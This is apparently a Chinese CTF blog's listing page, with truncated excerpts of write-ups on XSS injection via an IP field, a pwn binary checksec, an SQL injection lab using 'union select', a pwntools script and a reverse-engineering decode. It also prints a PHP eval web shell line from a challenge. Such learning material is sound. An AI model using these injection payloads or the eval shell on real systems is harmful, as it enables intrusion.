快说你是来旅游的😭 与 WriteUp 2024/7/19 – Ponder的博客 中举办喵相似,同样是需要进行 xss 注入,但这次无法直接在评论区注入,会被过滤。 尝试在用户名 / ip地址 / 评论区写 \123\,发现在 ip 地址区域成功显示加粗的 123,说明可以在这个地方进行 xss 注入。但是写入 11111111111111111…
1-rip 首先 checksec 一下: checksec ./pwn1 看到: Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Ex…
less-1_basic_char 基本流程 目标:获取数据库中所有用户名和密码 查找注入点 判断字符型还是数字型----字符型 字符型:找到闭合方式----可以通过单引号闭合 --+注释 group by 或者 order by 判断列数 查询回显位 输入一个不存在的 id 使得无效信息不再显示: id=-1' union select 1,2,…
复读机 只要把它给的东西喂回去就行,注意换行符 from pwn import * p = process('./repeater') # p = remote('course.hitctf.cn', 28512) p.send(b'lilac\n') p.send(b'cabnjsdfgcq12cas7\n') for i in range(99…
signin 根据常量倒着推即可: data = [0x10, 0x8, 0x15, 0x0a, 0x13, 4, 0x11, 0x3, 0x6, 0x5, 0x2b, 0x1d, 0x0d, 0x1e, 0x11, 0x1d, 0x1b, 0x0f, 0x9, 0x6f] ikun = "ikun\x00" s = [""] * …
跑马场 进入 /ma.php <?php // 真正的强者,敢于把自己的马送给别人 highlight_file(__FILE__); @eval($_REQUEST['dc64c146a42ea65baf7b5a7d64a50972']); $_REQUEST[] 既包含 GET 又包含 POST dc64c146a42ea65ba…